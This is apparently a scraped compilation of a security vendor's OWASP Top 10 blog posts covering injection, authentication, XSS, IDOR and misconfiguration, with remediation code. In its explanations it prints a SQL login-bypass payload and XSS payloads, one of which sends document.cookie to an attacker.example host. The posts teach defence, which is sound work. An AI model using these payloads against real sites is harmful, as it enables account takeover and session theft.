OWASP TOP 10: Injection | Disposable mail Blog – 10 minute mail

Injection, the first item on OWASP's Top 10 list, is most often found in database queries, but also turns up in OS commands, XML parsers and anywhere user input is passed as program arguments. A proof of concept video follows this article. OWASP is a non-profit organization with the goal of improving the security of software and the internet. We cover their list of the ten most common vulnerabilities one by one in our OWASP Top 10 blog series.

Description

Injection is the first item on OWASP's list. It is really a category rather than a single finding: it covers every vulnerability where an application sends untrusted data to an interpreter. It is most often found in database queries, but OS commands, XML parsers and user input passed as program arguments are other common examples.

Prevalence

This is a very common vulnerability type, especially in legacy code, as it was far more widespread a few years ago when fewer developers were aware of the danger. SQL injection is the best-known injection type, and according to a survey conducted by Ponemon, 65 percent of the organizations represented had experienced a SQL injection attack in the prior 12 months. That research was published two years before this post, but it should still serve as a reasonable estimate.

Potential impact

As Injection is a very broad category, the danger varies greatly from case to case. Since SQL injection is the best-known injection type, the impact is most often data stolen from a database, which can include usernames, passwords and other sensitive information.

The worst-case scenario is a full takeover of the system, which is certainly possible depending on where the injection is and in what environment it runs (for example, if the database user is allowed to write files or execute commands).

It is an attack that can be automated, which puts you at higher risk. An attacker does not need to be targeting you specifically: they can simply write a script that exploits as many sites as possible, and yours being one of them is a coincidence.

Well-known events

A few famous (or infamous) events involving SQL injection specifically can be found on Wikipedia.

One of the best-known SQL injection attacks was the one against Sony. Another, almost ironic, one was when MySQL's own website suffered a SQL injection. As the examples show, big players are also at risk and the result of an attack can be devastating.

How to discover

For more advanced users it is a vulnerability that can often be found through code analysis, i.e. identifying every query in the web application and following the data flow into it. As it sometimes generates no visible feedback (blind injection) it can be hard to detect during a black-box test, though it is usually still possible, for example by observing error responses or timing differences.

How Disposable mail can help

We provide a quick and easy way to check whether your site passes or fails OWASP Top 10 tests. Disposable mail is a web security scanner that performs fully automated tests to identify security issues on your website. It tests your website for over 700 vulnerabilities, including OWASP Top 10, and can be used on both staging and production environments. Sign up for a free trial to find out if you are vulnerable » 

Exploitability

As Injection is a very broad definition it varies from case to case, but a classic SQL injection is very easy to exploit. Troy Hunt once uploaded a video of himself teaching a three-year-old to exploit a SQL injection, to demonstrate that really anyone can learn to exploit this kind of vulnerability.

Code example of vulnerable application

A typical example of SQL injection is a login form backed by code like the following (PHP, as in the original post):

<?php
$db = new mysqli('localhost', 'root', 'passwd', 'base');

// Vulnerable: the request parameters are pasted straight into the SQL text
$result = $db->query('SELECT * FROM users WHERE user="'.$_GET['user'].'" AND pass="'.$_GET['password'].'"');

Suppose the attacker submits " OR 1 -- (with a space after the two dashes, which MySQL requires for a comment) as username and whatever as password. The whole query then ends up looking like this:

SELECT * FROM users WHERE user="" OR 1 -- " AND pass="whatever"

Everything after -- (which starts a comment in SQL) is discarded, so the query that actually executes is:

SELECT * FROM users WHERE user="" OR 1

The query now reads: grab everything (SELECT *) from the user list (FROM users) where the username matches the empty string (WHERE user="") or 1 (which is interpreted as true (OR 1)).

Since the right-hand side is always true, the OR makes the whole condition true regardless of the username, and the query returns the same result as:

SELECT * FROM users

which is every row there is about every user. The injection in the $_GET['user'] parameter alone is enough: the MySQL server returns all users, the application takes the first row as the logged-in user, and the attacker is granted access to that account without knowing any password.

Remediation

1. As Injection is more a category of vulnerabilities than a single bug, the remediation varies from case to case depending on the vector and the interpreter involved. The optimal solution is to use an API that either avoids the interpreter entirely or provides a parameterized interface, so that data travels separately from the query or command text.

Parameterized queries are not hard to write, and if you use PHP we recommend PDO with prepared statements. It may sound strange at first, but it really is not as hard as you may think. Examples in other languages can be found here.

2. If parameterized queries are not an option in your case, you should instead carefully escape special characters. How this is done depends on the interpreter used (and, for SQL, on the database and its connection settings), so it is something you need to look up for your specific case rather than write yourself.

3. Whitelist input validation is also an alternative, but often cannot be used alone as the application may legitimately require special characters as input. For example, a blog wants to allow its visitors to write comments containing quotes, even though a quote is exactly the character that can be used to break out of a query. In those cases it is necessary to go with solution one or two.
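To make the attack in the code example and remediations 1 and 2 concrete, here is an added example that is not from the original post, written in Python against an in-memory SQLite database instead of the post's PHP/MySQL setup. The login logic and the payload are the same as above; note that SQLite wants single-quoted string literals where the PHP example used double quotes (which MySQL accepts for strings). The users table and its two rows are constructed for the example.

```python
import sqlite3

# Constructed sample data for this example, not real credentials.
USERS = [("alice", "s3cret"), ("bob", "hunter2")]


def make_db():
    """In-memory SQLite database standing in for the post's MySQL 'base' database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user TEXT, pass TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return db


def login_vulnerable(db, user, password):
    """Builds the query by string concatenation, exactly like the mysqli example above.
    Returns the matching usernames; the application would log in as the first one."""
    sql = f"SELECT user FROM users WHERE user='{user}' AND pass='{password}'"
    return [row[0] for row in db.execute(sql)]


def login_escaped(db, user, password):
    """Remediation 2: escape the quote character before concatenating. This stops the
    payload below, but escaping is interpreter-specific and easy to get wrong (charsets,
    backslashes, numeric contexts), which is why parameterization is preferred."""
    user, password = user.replace("'", "''"), password.replace("'", "''")
    sql = f"SELECT user FROM users WHERE user='{user}' AND pass='{password}'"
    return [row[0] for row in db.execute(sql)]


def login_parameterized(db, user, password):
    """Remediation 1: placeholders. The SQL text is fixed and the values travel separately,
    so a quote or comment marker in the input is just data and cannot alter the query."""
    sql = "SELECT user FROM users WHERE user=? AND pass=?"
    return [row[0] for row in db.execute(sql, (user, password))]


def demo():
    """Runs the post's payload against all three variants and returns who each logs in."""
    db = make_db()
    # Closes the string literal, adds an always-true clause, comments out the rest.
    payload = "' OR 1 -- "
    return {
        "legitimate":           login_vulnerable(db, "alice", "s3cret"),
        "attack_vulnerable":    login_vulnerable(db, payload, "whatever"),
        "attack_escaped":       login_escaped(db, payload, "whatever"),
        "attack_parameterized": login_parameterized(db, payload, "whatever"),
    }


if __name__ == "__main__":
    for variant, users in demo().items():
        print(f"{variant:22s} -> {users}")
```

Running it shows the concatenated query returning both users for the payload (the attacker is logged in as alice, the first row), while the escaped and the parameterized variants return nothing because the payload is treated as a literal, nonexistent username.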

Injection Proof of Concept video:

Read more
The Ultimate SQL Injection Payload
SQL Injection Support Entry
What is an SQL Injection and How Do You Fix It
SQL Injection In 1 Min!
New Findings: Joomla, JBoss, Jenkins and others

Other injection types we have mentioned:
How Patreon Got Hacked: Publicly Exposed Werkzeug Debugger
How We Got Read Access On Google’s Production Servers

OWASP:
Top 10: Injection

 

Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

OWASP Top 10 Vulnerabilities Explained – 10 minute mail

OWASP is a non-profit organization with the goal of improving the security of software and internet. They have put together a list of the ten most common vulnerabilities to spread awareness about web security.  In this post, we have gathered all our articles related to OWASP and their Top 10 list. If you’d like to learn more about web security, this is a great place to start! 

Our OWASP TOP 10 posts offer an insight into each of the 10 vulnerability types on OWASP’s list. We describe the vulnerabilities, the impact they can have, and highlight well-known examples of events involving them. Of course, we also explain how to discover these vulnerabilities, providing code examples and helpful remediation tips.

OWASP TOP 10: Injection

Injection is a category that includes all kinds of vulnerabilities where an application sends untrusted data to an interpreter. It is often found in database queries, but other examples are OS commands, XML parsers or when user input is sent as program arguments.
Read full article »

OWASP TOP 10: Broken Authentication

Broken Authentication involves all kinds of flaws that are caused by error in implementations of authentication and/or session management. The category includes everything from login lacking timeout, meaning that users who forget to logout on a public computer can get hijacked, to more technical vulnerabilities such as session fixation.
Read full article »

OWASP TOP 10: Sensitive Data Exposure

Sensitive Data Exposure occurs when an application does not adequately protect sensitive information. The data can vary and anything from passwords, session tokens, credit card data to private health data and more can be exposed.
Read full article »

OWASP TOP 10: XXE (XML External Entities)

XXE allows attackers to abuse external entities when an XML document is parsed. If this happens, the attacker can read local files on the server, force the parser to make network requests within the local network, or use recursive linking to perform a DoS attack.
Read full article »

OWASP TOP 10: Broken Access Control

Broken Access Control is a vulnerability category that covers all access control issues that can make your website vulnerable. It is often found in web applications that have gradually grown in size without proper schemes regulating access. The category is the result of merging Insecure Direct Object References and Missing Function Level Access Control from the OWASP Top 10 2013 list.
Read full article »

OWASP TOP 10: Security Misconfiguration

Security misconfiguration is a very common vulnerability category that occurs when a component is susceptible to attack due to an insecure configuration. At worst, exploiting a security misconfiguration can lead to a full takeover.
Read full article »

OWASP TOP 10: Cross-site Scripting (XSS)

Cross-site Scripting is a type of attack that can be carried out to compromise users of a website. The exploitation of an XSS flaw enables the attacker to inject client-side scripts into web pages viewed by users. It is often assumed XSS only occurs in JavaScript, but it could also include e.g. VBScript.
Read full article »

OWASP TOP 10: Insecure Deserialization

Insecure Deserialization allows attackers to transfer a payload using serialized objects. This happens when integrity checks are not in place and deserialized data is not sanitized or validated.
Read full article »

OWASP TOP 10: Using Components with Known Vulnerabilities

It is very common for web services to include a component with a known security vulnerability. The component with a known vulnerability could be the operating system itself, the CMS used, the web server, some plugin installed or even a library used by one of these plugins, making this a very frequent finding.
Read full article »

OWASP TOP 10: Insufficient Logging and Monitoring

Insufficient Logging and Monitoring covers the lack of practices that should be in place to prevent security breaches or limit their damage. The category includes everything from unlogged events and logs that are not stored properly to warnings on which no action is taken within a reasonable time.
Read full article »

 

OWASP TOP 10 on Disposable mail Labs

Want more advanced tech content about OWASP Top 10 vulnerabilities? Check out these posts on Disposable mail Labs:

The Ultimate SQL Injection Payload
Finding an XSS in an HTML-based Android application
5 contexts where the XSS Auditor won’t help you
How to: Exploit an XSS
Frans Rosén’s Bugcrowd Guest Blog: Using a Braun Shaver to Bypass XSS Audit and WAF
How Patreon got hacked: Publicly exposed Werkzeug Debugger



IT Security FAQ 7: What is OWASP Top 10? – 10 minute mail

The Open Web Application Security Project (OWASP) is a worldwide not-for-profit charitable organization focused on improving the security of software. Their mission is to make software security visible, so that individuals and organizations can make informed decisions about cyber security risks. They also publish a list called OWASP Top 10 with the ten most common security issues online.

Comment from our expert:
”OWASP top 10 doesn’t focus on specific vulnerabilities but rather concepts in general that are usual security breaches in software. For example, the login and authentication module is often weak on many websites. The list gives some ideas on what to think about in terms of cyber security. I think it’s good for developers to read through it at least once and reflect upon it,” says Johan Edholm at Disposable mail.

To find out more, visit the OWASP top 10 project and check out our series on OWASP top 10 security issues. Want to test your site for OWASP vulnerabilities? Sign up for a free trial and run a Disposable mail scan!

Want more IT security information? Don’t miss out on the other parts of our IT Sec FAQ series!


OWASP TOP 10: Broken Authentication – 10 minute mail

The next vulnerability on OWASP’s Top 10 list is Broken Authentication, a broad category covering a wide range of  security flaws. OWASP is a non-profit organization with the goal of improving the security of software and the internet. We cover their list of the ten most common vulnerabilities one by one in our OWASP Top 10 blog series. 

Description

Broken Authentication involves all kinds of flaws caused by errors in the implementation of authentication and/or session management. Due to the wide range of vulnerabilities therein it is quite hard to define its general properties.

The category includes everything from login lacking timeout, meaning that users who forget to logout on a public computer can get hijacked, to more technical vulnerabilities such as session fixation.

Prevalence

Developers tend to write their own authentication and session-management code. That is something that is hard to get right, which is why the different kinds of flaws in this category are so common.

Potential impact

The goal of an attack is to take over one or more accounts, and for the attacker to get the same privileges as the attacked user. If the attacker successfully hijacks an admin account, the attacker could therefore do as much as an ordinary admin, which depending on the application could have a great impact.

Exploitability

As it is such a broad category it is impossible to say how hard it is to exploit. OWASP classifies the exploitability as average, but it really depends on the specific vulnerability. Some of the vulnerabilities that fall into this category can be automated, but many of them require the attacker to be manually involved in the attack.

Well-known events

One type of finding that falls into this category is storing passwords in plain text. If someone were to hack a service and get hold of the passwords in plain text, the attacker could use those credentials to log in to the service as any user. As people tend to reuse passwords, an attacker could also try the same credentials on other services.

One of the best-known recent cases of this was when 000webhost got hacked in 2015. That leak alone meant 13 million credentials in plain text.

How to discover

Some of these vulnerabilities can be scanned for automatically, which Disposable mail does when possible. However, some of the vulnerabilities under this category are simply not possible to look for in an automatic way.

When searching for this kind of vulnerabilities, it is of great advantage to read all the source to get a better overview of the situation. As it is such a broad category as it is, the ways to look for these vulnerabilities vary as well.


Example of a vulnerable application

A webshop puts the session id in the URL. Links then look like this: http://example.com/?product=chair&session=51233123

If the user likes that product and wants to share it with a friend, they copy the link without giving it much thought. When the friend clicks the link, they inherit the same session id, and if they decide to buy something, the first user's credit card is charged.

Remediation

Security needs to be part of the development process from the beginning. That is the only way to ensure nothing can be abused in a way that was not considered during development, as those kinds of vulnerabilities are hard to look for afterwards.

Many of the vulnerabilities within the category exist because developers make mistakes. It is possible to fight that problem by making it harder to make mistakes, for example by creating simple APIs that prevent the incorrect use that leads to vulnerabilities. There are also many solutions available that have already been tested, so it is a good idea to look into those before reinventing the wheel.

The last vulnerability mentioned here, even though this category involves many more, is XSS used to steal session cookies. There are several ways to resolve this, or at least make it not quite as bad. We recommend two of our remediation documents:
XSS
Missing HTTPOnly
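The session problems named in this post (a login without timeout, session fixation, a session id in the URL, and cookies readable by an XSS) all come down to how the server issues, transports and expires session ids. The following is an added example, not code from the original post, in Python: a minimal server-side session store that rotates the id at login, expires idle sessions, and emits the cookie with the HttpOnly flag the remediation document recommends. The 15-minute idle timeout and the cookie name are assumed values.

```python
import secrets
import time

IDLE_TIMEOUT = 15 * 60  # seconds of inactivity before a session dies (assumed policy value)


class SessionStore:
    """Server-side sessions: the browser holds only an opaque random token, never the user id.
    A clock callable is injected so the timeout behaviour can be tested without sleeping."""

    def __init__(self, clock=time.time):
        self._sessions = {}  # token -> {"user": str or None, "last_seen": float}
        self._clock = clock

    def _issue(self, user):
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG, not guessable
        self._sessions[token] = {"user": user, "last_seen": self._clock()}
        return token

    def new_anonymous(self):
        """Session for a visitor who has not logged in yet (shopping cart, CSRF token, ...)."""
        return self._issue(None)

    def login(self, old_token, user):
        """Destroy the pre-login token and issue a fresh one. A token an attacker planted in
        the victim's browser before login (session fixation) therefore never becomes
        an authenticated session."""
        self._sessions.pop(old_token, None)
        return self._issue(user)

    def user_for(self, token):
        """Resolve a token to a logged-in user, or None if unknown, anonymous or idle too long."""
        session = self._sessions.get(token)
        if session is None:
            return None
        if self._clock() - session["last_seen"] > IDLE_TIMEOUT:
            del self._sessions[token]  # the forgotten public-computer session expires by itself
            return None
        session["last_seen"] = self._clock()
        return session["user"]

    def logout(self, token):
        self._sessions.pop(token, None)


def session_cookie(token):
    """Set-Cookie value for the token. HttpOnly keeps page scripts (an XSS) from reading it,
    Secure keeps it off plaintext HTTP, SameSite=Lax stops most cross-site requests from
    carrying it. The token goes in a cookie, never in the URL as in the webshop above."""
    return f"session={token}; Path=/; HttpOnly; Secure; SameSite=Lax"
```

The store keeps all state server-side, so the only thing a shared link or a leaked cookie can reveal is a random token that stops working after logout, after the idle timeout, or as soon as the user logs in again and gets a new one.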

Read more

OWASP:
Top 10: Broken Authentication and Session Management

 


OWASP TOP 10: Cross-site Scripting – XSS – 10 minute mail

Cross-site scripting is one of the most common OWASP vulnerabilities, affecting both small businesses and large corporations. OWASP is a non-profit organization with the goal of improving the security of software and the internet. We cover their list of the ten most common vulnerabilities one by one in our OWASP Top 10 blog series. A proof of concept video is found at the end of the article. 

Description

Cross-site scripting is a type of attack that can be carried out to compromise users of a website. The exploitation of an XSS flaw enables the attacker to inject client-side scripts into web pages viewed by users.

It is often assumed that cross-site scripting means JavaScript, but could also include e.g. VBScript.

Prevalence

Cross-site scripting is often said to be the most common vulnerability, and many sites are affected. This includes small local sites as well as giants like Google. In 2016, Cross-site scripting was among the top 5 most common critical vulnerabilities discovered by the Disposable mail scanner.

Potential impact of cross-site scripting vulnerabilities

Due to the ability to execute JavaScript under the site’s domain, the attackers are able to:

  • View anything the user sees, and steal sensitive information by doing so.
  • Change what the user sees and manipulate information.
  • Basically do everything a normal user could, as the attacker can both see and change anything presented to the user. This includes bypass of all CSRF-protections. To put it into context; if the attacker successfully tricks an admin to execute the XSS, the attacker can do everything an admin could do.
  • Do things that the vulnerable domain has been granted permission to do, which can include access to the user's webcam, microphone or location.

Exploitability

Any source of data that the browser ends up rendering is a potential attack vector. This means there are many different ways to exploit a site, which increases the risk.

Cross-site scripting is considered one of the easier vulnerability types to understand. With that said, there is no limit on how complicated it can be to exploit under different circumstances and protections.

Well-known events

One of many great examples where XSS is used as a part in a longer chain of attacks is the following: https://blogs.apache.org/infra/entry/apache_org_04_09_2010

One of the most famous attacks is the attack called Samy. Within 20 hours, over a million users had fallen victim for the vulnerability. This happened in 2005, but even today there are several examples showing that XSS is a vulnerability type to keep an eye on.

Another well-known attack, similar to Samy, is the 2014 attack on TweetDeck. They had a cross-site scripting vulnerability, and everyone who fell victim to it automatically retweeted it, so it quickly turned into a self-spreading worm.

How to discover cross-site scripting

It is possible to categorise cross-site scripting vulnerabilities in different subcategories. One of those are the ones that only lay in the client, where the site owner would need to analyze all the JavaScript to identify how all data that originates from a user flows. At first, it is easy to think about only the normal places, but after a while it is obvious that there are many more vectors than one would initially think about.

Then there is reflected cross-site scripting, which is when the page simply reflects some kind of input from the user, such as a search term echoed back on the results page (see the code example below).

There are also stored cross-site scripting vulnerabilities, where the server instead echoes something previously saved in the database.

This makes it hard to analyze everything automatically: to find such flaws one has to trace every output back to where the data came from and how it was manipulated on the way there.

In short, it can be concluded that for discovering the first mentioned type the site owner would need to follow the dataflow all through JavaScript to see how it treats user input. In this case, user input can be default variables in JavaScript such as

location.hash

as well as e.g.

form-data

For the second mentioned vulnerability, the site owner needs to look for every location where data is printed, and identify how it got treated on its way there as well as where the data originates from. In real life examples, it is not uncommon to see a combination of these vulnerability types.

How Disposable mail can help

Disposable mail is a web security scanner that performs fully automated tests to identify security issues on your website. It tests your website for over 700 vulnerabilities, including cross-site scripting and other OWASP Top 10 vulnerabilities, and can be used on both staging and production environments. Sign up for a free trial to find out if you are vulnerable » 

Code example of a vulnerable application

Assume a site has a search box backed by PHP like the following (the opening of the if-statement was lost when the page was extracted; the else branch is the relevant part):

<?php
if ($found) {   // $found: whether the search produced any results
    // Code for performing the actual search
} else {
    echo "Could not find any pages when searching for ".$_GET['query'];
}
?>

Requesting

https://example.com/search.php?query=test

would therefore result in:

Could not find any pages when searching for test

This outputs the user input straight into the HTML document. As such, if a user gives HTML as input, the browser will render it.

For example, if we were to access

https://example.com/search.php?query=<script>alert(1)</script>

the browser would try to render the following:

Could not find any pages when searching for <script>alert(1)</script>

That is perfectly valid HTML, and the script will get executed.

To show the danger of this, imagine an attacker getting the user to click a link like the following (attacker.example stands in for a host the attacker controls):

https://example.com/search.php?query=<script>document.location='http://attacker.example/?c='+document.cookie</script>

It would result in this, which sends the user's cookies to the attacker. If they include a session id, the attacker can hijack the session:

Could not find any pages when searching for <script>document.location='http://attacker.example/?c='+document.cookie</script>

Cross-site scripting remediation

Potentially dangerous characters need to be sanitized or, better, escaped for the context they are output in. How this is done varies depending on the context (HTML body, attribute, JavaScript string, URL), and for most cases the article in our knowledge database is sufficient.

The application should also be developed with the risk of XSS in mind, so that an XSS vulnerability does as little harm as possible if one does exist. Two of the best-known methods for this are the HttpOnly cookie flag (which keeps scripts from reading the session cookie) and CSP. More information about HttpOnly can be found here, while CSP is something we have not written that much about.
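As an added example that is not from the original post, here is the search-page echo from the code example rewritten in Python, with the output escaped for each of the contexts the remediation paragraph mentions. The page's own code is PHP, where htmlspecialchars() plays the role of html.escape(); the payloads and the CSP value are constructed for the example.

```python
import html
import json
from urllib.parse import quote

MESSAGE = "Could not find any pages when searching for "


def render_vulnerable(query):
    """The search.php behaviour: user input pasted straight into the HTML body."""
    return MESSAGE + query


def render_html_text(query):
    """HTML body (or double-quoted attribute) context: & < > " ' become entities,
    so the browser displays the payload instead of parsing it."""
    return MESSAGE + html.escape(query, quote=True)


def render_js_string(query):
    """Inline-script context. HTML escaping is the wrong tool here: the value must be a
    valid JS string literal, and '<' is escaped so that '</script>' inside the data
    cannot close the script element early."""
    literal = json.dumps(query).replace("<", "\\u003c")
    return f"<script>var q = {literal};</script>"


def render_url_param(query):
    """URL context: percent-encode before placing the value in a query string."""
    return f'<a href="/search.php?query={quote(query, safe="")}">search again</a>'


def load_js_string(rendered):
    """Inverse of render_js_string, used to check the data survives encoding intact."""
    start = rendered.index("var q = ") + len("var q = ")
    end = rendered.index(";</script>")
    return json.loads(rendered[start:end])


# Defence in depth: a policy like this makes the browser refuse inline scripts entirely,
# so even an escaping mistake in the HTML above would not run the payload.
CSP_HEADER = "Content-Security-Policy: default-src 'self'; script-src 'self'"
```

The point of the three render functions is that the escaping rule follows the output context, not the input: the same search string needs entity encoding in the HTML body, JSON encoding plus a `<` escape inside a script, and percent-encoding inside a URL. Pick the wrong one (or apply it twice) and the output is either still injectable or corrupted.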

Read more

Related remediation documents:
http://support.detectify.com/customer/en/portal/articles/1711512-cross-site-scripting
http://support.detectify.com/customer/en/portal/articles/1969826-missing-httponly-flag-on-cookies

OWASP:
https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)

Other:
http://scriptalert1.com

 


[Alert] New WordPress XSS Vulnerability Discovered – 10 minute mail

Are you running WordPress 4.2.0 to 4.5.1? Time to upgrade to 4.5.2!

It was recently discovered that WordPress versions 4.2.0 to 4.5.1 are vulnerable to a reflected XSS vulnerability in a specific SWF file shipped with WordPress: flashmediaelement.swf. The vulnerability could lead to leaked WordPress credentials, or be used as a stepping stone to more severe attacks.

3 things you can do to protect your website:

  • Upgrade to WordPress version 4.5.2 as soon as possible.
  • Remove the flashmediaelement.swf file (if you do not know how to proceed, the best option is to simply upgrade the WordPress-version).
  • A third option is to restrict which IP addresses may reach the site, e.g. to your office or VPN addresses.

As always, we recommend you to run regular security tests on your website to keep up with all the latest vulnerabilities.

Stay safe!


OWASP TOP 10: Insecure Direct Object Reference – 10 minute mail

Insecure Direct Object Reference allows attackers to manipulate references to gain access to unauthorized data. A proof of concept video follows this article. OWASP is a non-profit organization with the goal of improving the security of software and the internet. We cover their list of the ten most common vulnerabilities one by one in our OWASP Top 10 blog series. OWASP Top 10 2017 was released in November 2017, bringing some changes to the list from 2013. We are working on updating our content, but in the meantime, please take a look at our article about OWASP Top 10 2017.

Description

The fourth one on the list is Insecure Direct Object Reference, also called IDOR. It refers to when a reference to an internal implementation object, such as a file or database key, is exposed to users without any other access control. In such cases, the attacker can manipulate those references to get access to unauthorized data.

Prevalence

There are no good numbers to base the estimation on and OWASP’s formulation on the subject is also very vague. However, by looking at well-known events as well as public bug bounty-reports it can be confirmed that it is a very common vulnerability. This is also what we have discovered during our own security research.

Potential impact of Insecure Direct Object Reference

It is impossible to say in general what the potential impact of IDOR is, as it varies a lot depending on what kind of data or file the attacker may get hold of. It could be anything from harmless information to bank statements, and much more.

Exploitability

Due to it being so easy for an attacker to exploit, IDOR is very likely to be abused. This of course varies as well, as it may not always be obvious how to enumerate the links for the files.

Well-known events

Back in 2010, when the iPad was the coolest gadget for early adopters, AT&T suffered from an Insecure Direct Object Reference that exposed the details of over 100,000 iPad owners. It exposed the owners' email addresses as well as their ICC-IDs (the ID of the SIM card). As Apple had provided the data to AT&T, Apple often receives the blame for this vulnerability.

By sending a request to AT&T's site with an ICC-ID, the server would respond with the corresponding email address. As ICC-IDs are sequential enough to be enumerated after looking at just a few of them, the attack could be fully automated, allowing a considerable data leak.

How to discover Insecure Direct Object Reference

Code analysis is suitable for this kind of vulnerability. Every place that presents restricted data needs to be investigated, to make sure that there are checks in place ensuring that the user is authorized for the requested information.

This can of course be automated to some extent without access to the source code of the site, but having it is a great advantage. With the source in hand, a vulnerability like this is often quite easy to discover.


Example of vulnerable application

When a user accesses the dashboard on the user’s bank’s website, the user gets redirected to the following url:
https://bank/balance?acc=123

In this case, 123 is the ID of the user’s account, and the user will therefore see that balance. If the user wanted to abuse this, it would be possible to just change the URL-parameter to someone else’s ID and instead get access to that ID’s account.

Remediation

The only real solution to this issue is to implement access control: the server must check that the user is authorized for the requested object before providing it.

It is also often recommended to use a reference that is less obvious and harder to enumerate, e.g. a random string instead of an incrementing integer. This can be a good idea for multiple reasons (it at least stops blind enumeration), but it should absolutely not be trusted as the only protection: links get shared and logged, and anyone who obtains the reference would still get in.
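An added example (not from the original post, and in Python rather than a real bank's stack) of the two remediations: the balance endpoint from the example above first without an ownership check and then with one, plus the enumeration loop an attacker runs against each. The account data, user names and the Forbidden error are constructed for the example.

```python
import secrets

# Constructed sample data: account id -> (owner, balance). Sequential ids, as in the post's URL.
ACCOUNTS = {123: ("alice", 1500), 124: ("bob", 42), 125: ("carol", 99000)}


class Forbidden(Exception):
    """Raised when the logged-in user may not see the requested object (HTTP 403/404)."""


def balance_vulnerable(session_user, acc):
    """The post's /balance?acc=123 handler: the user is authenticated, but the acc
    parameter is trusted, so any logged-in user can read any account."""
    return ACCOUNTS[acc][1]


def balance_checked(session_user, acc):
    """Fixed handler: the object is only returned if it belongs to the session user.
    Missing and foreign accounts raise the same error, so the endpoint does not become
    an oracle for which ids exist."""
    owner, balance = ACCOUNTS.get(acc, (None, None))
    if owner is None or owner != session_user:
        raise Forbidden(acc)
    return balance


def enumerate_as(session_user, handler, ids):
    """What an attacker logged in as session_user learns by walking a range of ids."""
    seen = {}
    for acc in ids:
        try:
            seen[acc] = handler(session_user, acc)
        except (Forbidden, KeyError):
            pass
    return seen


def opaque_account_id():
    """Unguessable reference (the 'random string instead of an incrementing integer'
    advice). It stops blind enumeration but is not a substitute for the ownership check:
    anyone who obtains the id, e.g. from a shared link or a log, would still get in."""
    return secrets.token_urlsafe(16)
```

Walking ids 120 to 129 as bob against the vulnerable handler yields every account's balance; against the checked handler it yields only bob's own, and the attacker cannot even tell which other ids exist.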

IDOR Proof of Concept video:

Read more

OWASP:
https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References
https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004)

Interesting public bug bounty-reports:
https://hackerone.com/reports/42587
https://hackerone.com/reports/53858

Other:
https://www.troyhunt.com/owasp-top-10-for-net-developers-part-4/

Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

OWASP TOP 10: Security Misconfiguration – 10 minute mail

Security misconfiguration is the fifth vulnerability on OWASP's list of the ten most common vulnerabilities. A proof of concept video follows this article. OWASP is a non-profit organization with the goal of improving the security of software and the internet. We cover their Top 10 list one by one in our OWASP Top 10 blog series.

Description

If a component is susceptible to attack because of an insecure configuration, it is classified as security misconfiguration. It is considered the same vulnerability regardless of whether the misconfiguration is in the web server, the database or custom code.

Prevalence

As security misconfiguration is such a broad category, it is a very common vulnerability. A web application is built upon multiple layers and making a configuration mistake in one of them is quite likely.

Potential impact

The impact varies and depends on the specific kind of misconfiguration. At worst, it could lead to a full takeover, which means stolen sensitive data and expensive recovery.

Exploitability

In many cases this is one of the easiest vulnerabilities to exploit. For example, if a system admin forgets to delete a default account with admin privileges, all an attacker has to do is google the default credentials and log in.

Of course, there are more difficult versions of this vulnerability out there that require more knowledge. Not all misconfigurations make a full takeover possible, but they may still be used as part of a bigger attack.

Well-known events

The Werkzeug debugger includes a console that allows a user to execute system commands. Some deployments exposed that interface to the internet, which results in RCE (remote code execution). An example of this that received a lot of attention is when we found this vulnerability at Patreon.

How to discover

The only way to discover security misconfigurations is to start looking over the system.

  • Are any default accounts left, and if so, have the passwords been changed?
  • When it is possible to enforce better security in a framework, are those options chosen?
  • Are there any unnecessary features installed/enabled that can be removed? This includes accounts, too many privileges, ports, etc.
  • Does the error handling reveal overly informative error messages to users? This is one of the most common issues.

How Disposable mail can help with security misconfiguration

Disposable mail is a web security scanner that performs fully automated tests to identify security issues on your website. It tests your website for over 700 vulnerabilities, including OWASP Top 10, and can be used in both staging and production. Sign up for a free trial to find out if you are vulnerable » 

Example of vulnerable application

A great example that helps to understand this issue is the aforementioned Patreon case. There is often some feature that allows debugging the system. If that feature is exposed to the internet and not behind any authorisation, any user could abuse it.

Prevention

  • Make sure everything is updated. When building the system, make it easy to deploy software updates and patches.
  • Use the same configuration for staging, production and developing environments. Many misconfigurations are the result of inconsistencies.
  • Humans are good at making mistakes, which is why you should automate what can be automated. If the same setup procedure is performed often, it is better to make sure it is secure once and then just repeat it.
  • Perform scans and/or audits regularly to discover future misconfigurations.
  • When possible, configure the system on the assumption that it will get compromised, because that is very likely. In the event of a breach, an attacker should then only be able to do very little damage.

Read more

OWASP:
https://www.owasp.org/index.php/Top_10_2013-A5-Security_Misconfiguration

Our blog:
How Patreon got Hacked: Publicly Exposed Werkzeug Debugger


OWASP TOP 10: Sensitive Data Exposure – 10 minute mail

Sensitive Data Exposure, an OWASP Top 10 vulnerability that often affects smaller players, can put critical sensitive data at risk. OWASP is a non-profit organization with the goal of improving the security of software and the internet. We cover their list of the ten most common vulnerabilities one by one in our OWASP Top 10 blog series. 

Description

Sensitive Data Exposure occurs when an application does not adequately protect sensitive information. The data can vary and anything from passwords, session tokens, credit card data to private health data and more can be exposed.

A few examples: data that someone mistakenly uploaded somewhere, weak crypto that lets an attacker read the data once they have compromised the target, and missing headers that would have prevented the browser from caching the data. In short, every case where it would have been possible to protect the sensitive data better.

Prevalence

When building an application, many down-prioritise the protection of sensitive data. Even a developer who knows that passwords should, for example, be hashed commonly plans to do so later. A working application is the top priority, and once the application works, the planned protection is forgotten or simply skipped.

Dealing with crypto is also one of the most difficult things to do. It is therefore common to make mistakes when implementing a self-built solution, which will result in insufficient protection of data.

Sensitive Data Exposure is therefore a typical vulnerability that is worst for small players, like hobby projects and smaller companies. However, as can be seen by looking at some well-known events, big players are affected by these vulnerabilities as well, but not as often.

Potential impact

